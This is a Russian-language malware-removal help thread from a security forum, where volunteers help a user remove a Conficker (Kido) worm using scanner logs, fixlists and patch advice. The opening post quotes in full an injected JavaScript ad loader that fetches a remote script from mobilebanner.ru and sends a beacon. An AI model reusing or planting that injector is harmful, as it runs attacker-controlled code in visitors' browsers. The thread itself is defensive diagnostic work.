mobilebanner.ru [Net-Worm.Win32.Kido.ih ]

[usrg]

Нашел сходную тему, где пока нет ответа - http://virusinfo.info/showthread.php?t=206330 - и решил добавить немного деталей, но в той теме не могу отвечать.

Зловреда обнаружил по зависшему запросу к d.mobilebanner.ru с обращением за файлом p.gif и подумал, что у меня сайт заражен, но весь код на сервере чистый и соответствует летнему бекапу. В итоге нашел подмену одного из загружаемых javascript-ов вот таким -

PHP код:

!function(){function t(){(new Image).src="http://d.mobilebanner.ru/p.gif"}function e(){return window.innerWidth>=320&&window.innerWidth<=450}function n(){try{return window.self!==window.top}catch(t){return!0}}function r(){var t=document.getElementsByTagName("head")[0],e=document.createElement("script");e.src="http://p.mobilebanner.ru/ad/base.js?",e.type="text/javascript",t.appendChild(e)}function i(t){a.parentNode.insertBefore(t,a.nextSibling)}function c(t){document.write(t.outerHTML)}function o(){for(var t=document.createElement("script"),e=Array.prototype.slice.call(a.attributes),n=0;n<e.length;n++)t.setAttribute(e[n].nodeName,e[n].nodeValue);return t.src="http://сайт.домен/оригинальный_скрипт.js?",t}var a=document.currentScript||document.scripts[document.scripts.length-1],d=o();a.async||a.defer?i(d):c(d),t(),window.__qsrad||n()||!e()||(window.__qsrad=1,r())}(); 


Пользуюсь Mozilla FireFox и в других браузерах проблемы не наблюдается. Проверка системы AWCleaner/HitmanPro/CureIt/KVRT ничего не дала. Файлы от Hijack и avz прикладываю к посту, хотя дальше файрфокса заражение видимо не ушло.

[Info_bot]

Уважаемый(ая) usrg, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[SQ]

Здравствуйте,

Код:

>>> Подозрение на маскировку ключа реестра службы\драйвера "kypfmrnpe"

- Покажите лог TDSSKiller
Файл C:\TDSSKiller.***_log.txt приложите в теме.
(где *** - версия программы, дата и время запуска.)

- Сделайте лог Check Browsers' LNK by Dragokas & regist.

- Подготовьте лог AdwCleaner и приложите его в теме.

[usrg]

Я ошибся в первом сообщении насчет активности только в ФайрФоксе - в Хроме тоже самое.

***

TDSSKiller что то нашел и кажется убил. Две других проги ничего не обнаружили.

[SQ]

Уточните пожалуйста в каталоге TDSSKiller образовался ли карантин?

Если присутствует карантин, то пожалуйста загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

Код:

09:18:13.0468 0x0f68  Detected object count: 1
09:18:13.0468 0x0f68  Actual detected object count: 1
09:18:24.0390 0x0f68  C:\WINDOWS\system32\owasuy.dll - copied to quarantine
09:18:24.0390 0x0f68  HKLM\SYSTEM\ControlSet002\services\udsgld - will be deleted on reboot
09:18:24.0390 0x0f68  HKLM\SYSTEM\ControlSet004\services\udsgld - will be deleted on reboot
09:18:24.0390 0x0f68  HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\svchost:netsvcs - will be cured on reboot
09:18:24.0390 0x0f68  C:\WINDOWS\system32\owasuy.dll - will be deleted on reboot
09:18:24.0390 0x0f68  udsgld ( UDS:DangerousObject.Multi.Generic ) - User select action: Delete 
09:18:24.0484 0x0f68  KLMD registered as C:\WINDOWS\system32\drivers\42014655.sys
09:18:56.0828 0x0e4c  Deinitialize success

[usrg]

Уточните пожалуйста в каталоге TDSSKiller образовался ли карантин?

Если присутствует карантин, то пожалуйста загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

Образовался. Загрузил архивом по ссылке.

[SQ]

Образовался. Загрузил архивом по ссылке.

Обнаружен Net-Worm.Win32.Kido.ih

Пройдитесь утилитой KidoKiller.exe сообщите результат.

[usrg]

Копирую экран отработавшей утилиты -

Net-Worm.Win32.Kido removing tool, Kaspersky Lab 2010
version 3.4.15 Mar 19 2010 10:17:17
scanning jobs ...

scanning processes ...

scanning threads ...

scanning modules in svchost.exe...
scanning modules in services.exe...
scanning modules in explorer.exe...

scanning C:\WINDOWS\system32 ...
C:\WINDOWS\system32\owasuy.dll infected Net-Worm.Win32.Kido ... cured
scanning C:\Program Files\Internet Explorer\ ...
scanning C:\Program Files\Movie Maker\ ...
scanning C:\Program Files\Windows Media Player\ ...
scanning C:\Program Files\Windows NT\ ...
scanning C:\Documents and Settings\User\Application Data ...
scanning C:\WINDOWS\Temp\ ...
scanning Flash drives ...

completed
Infected jobs: 0
Infected files: 1
Infected threads: 0
Spliced functions: 0
Cured files: 1
Fixed registry keys: 3

Для продолжения нажмите любую клавишу . . .

Я думал TDSSKiller закрыл вопрос, во всяком случае браузеры перестали ломиться на мобайлбаннер... а зловред оказывается активен

[SQ]

Перегрузите ПК и проверьте заново.

[usrg]

После первой перезагрузки не появилось, но сейчас уже снова dll-ка в system32 и сервис, который встраивает мобайлбаннер...

Скачал чуть не десяток убийц Kido от всех производителей антивирей - ничего не нашли, а меж тем загрузчик зловреда где то сидит.

[SQ]

- Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

• Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
• Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5".
  
• Нажмите кнопку Scan.
• После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
• Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.

[usrg]

Логи Farbar прикладываю к сообщению.

Прогнал kidokiller - пока чисто, но за компом никто не работал, а в прошлый раз зловред не сразу возвращался...

[SQ]

Знакома ли Вам?

Код:

FF Extension: (Google search link fix) - C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\b3928exo.Default User\Extensions\[email protected] [2016-09-04]

• Закройте и сохраните все открытые приложения.
• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
  
  Код:

  CreateRestorePoint:
  CloseProcesses:
  HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
  HKU\S-1-5-21-1801674531-362288127-725345543-1004\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
  FF Extension: (No Name) - C:\Program Files\Mozilla Sunbird\extensions\[email protected] [not found]
  FF Extension: (No Name) - C:\Program Files\Mozilla Sunbird\extensions\{e2fda1a4-762b-4020-b5ad-a41df1933103} [not found]
  FF SearchPlugin: C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\b3928exo.Default User\searchplugins\yqs-barff-yandex.xml [2013-09-08]
  FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Java\jre6\lib\deploy\jqs\ff => not found
  FF HKU\S-1-5-21-1801674531-362288127-725345543-1004\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Internet Download Manager\idmmzcc2.xpi => not found
  FF HKU\S-1-5-21-1801674531-362288127-725345543-1004\...\SeaMonkey\Extensions: [[email protected]] - C:\Documents and Settings\User\Application Data\IDM\idmmzcc5 => not found
  FF HKU\S-1-5-21-1801674531-362288127-725345543-1004\...\SeaMonkey\Extensions: [[email protected]] - C:\Program Files\Internet Download Manager\idmmzcc2.xpi => not found
  FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll [No File]
  CHR HomePage: Default -> hxxp://www.yandex.ru/?win=84&clid=1976586-10000000
  CHR StartupUrls: Default -> "hxxp://www.yandex.ru/?win=84&clid=1976586-10000000"
  CHR DefaultSearchURL: Default -> hxxp://{searchTerms}
  CHR DefaultSearchKeyword: Default -> hax
  CHR Plugin: (Shockwave Flash) - C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\Application\21.0.1180.83\PepperFlash\pepflashplayer.dll => No File
  CHR Plugin: (Shockwave Flash) - C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\Application\49.0.2623.112\gcswf32.dll => No File
  CHR Plugin: (Shockwave Flash) - C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll => No File
  CHR Plugin: (Native Client) - C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\Application\49.0.2623.112\ppGoogleNaClPluginChrome.dll => No File
  CHR Plugin: (Chrome PDF Viewer) - C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\Application\49.0.2623.112\pdf.dll => No File
  CHR Plugin: (QUAKE LIVE) - C:\Documents and Settings\All Users\Application Data\id Software\QuakeLive\npquakezero.dll => No File
  CHR Plugin: (Google Update) - C:\Documents and Settings\User\Local Settings\Application Data\Google\Update\1.3.21.111\npGoogleUpdate3.dll => No File
  CHR Plugin: (Java(TM) Platform SE 6 U31) - C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll => No File
  CHR Plugin: (VLC Web Plugin) - C:\Program Files\VideoLAN\VLC\npvlc.dll => No File
  CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\4.1.10111.0\npctrl.dll => No File
  CHR HKLM\...\Chrome\Extension: [hegneaniplmfjcmohoclabblbahcbjoe] - hxxp://clients2.google.com/service/update2/crx
  CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files\Internet Download Manager\IDMGCExt.crx <not found>
  CHR HKLM\...\Chrome\Extension: [nkcpopggjcjkiicpenikeogioednjeac] - C:\Documents and Settings\User\Local Settings\Temp\nkcpopggjcjkiicpenikeogioednjeac.crx <not found>
  CHR HKLM\...\Chrome\Extension: [ochbjojkpcmlfeagbaahkofepalngihg] - <no Path/update_url>
  CHR HKU\S-1-5-21-1801674531-362288127-725345543-1004\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [hegneaniplmfjcmohoclabblbahcbjoe] - hxxp://clients2.google.com/service/update2/crx
  S2 StarOpen; no ImagePath
  NETSVC: kypfmrnpe -> no filepath.
  Task: C:\WINDOWS\Tasks\µTorrent.job => C:\PROGRA~1\uTorrent\uTorrent.exe
  AlternateDataStreams: C:\Documents and Settings\All Users\Application Data\TEMP:93433455 [822]
  AlternateDataStreams: C:\Documents and Settings\User\Рабочий стол\ToXXuS(xmir.or)_Bike.pdf:.gltth [21090]
  Reboot:

• Запустите FRST и нажмите один раз на кнопку Fix и подождите.
• Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
• Обратите внимание, что компьютер будет перезагружен.

[usrg]

Знакома ли Вам?

Код:

FF Extension: (Google search link fix) - C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\b3928exo.Default User\Extensions\[email protected] [2016-09-04]

Да - https://github.com/palant/searchlinkfix - поставил вполне сознательно.

Лог фикса от Farbar прилагаю.

Зловреда пока все так же не видно - возможно какое то из опробованных антивирусных средств сработало, но без оповещений... И это был не kidokiller, посколько за последнии пару недель он минимум трижды убивал owasuy.dll в систем32 и какие то ключи в реестре, почему и опробовал десяток подобных ему утилит доступных в сети.

[SQ]

Установите какой-то антивирус, например Kaspersky Free (бесплатный) скорее всего у Вас в сети есть зараженный ПК, который заражает Ваш ПК.

P.S. Вам необходимо найти ip-адрес зараженного ПК.

[usrg]

В сети у соседа нашелся комп, где Avira проморгала заражение... Лечим.

Спасибо. Думаю тема исчерпана.

P.S. Что закрыть/отключить в XP, чтобы Kido не мог заражать через сеть?! Помимо установки антивируса...

[mrak74]

P.S. Что закрыть/отключить в XP, чтобы Kido не мог заражать через сеть?! Помимо установки антивируса...

Ничего отключать не надо. Вирус использует уязвимость Windows, для того чтобы её закрыть необходимо установить 3 обновления Microsoft: kb 958644, kb 957097, kb 958687.

[CyberHelper]

Статистика проведенного лечения:

• Получено карантинов: 1
• Обработано файлов: 1
• В ходе лечения обнаружены вредоносные программы:
  
  1. \tdsskiller_quarantine\01.12.2016_09.18.03\uds0000 \svc0000\tsk0000.dta - Net-Worm.Win32.Kido.ih ( DrWEB: Win32.HLLW.Autoruner.5555, BitDefender: Win32.Worm.Downadup.Gen, NOD32: Win32/Conficker.AA worm, AVAST4: Win32:Confi [Wrm] )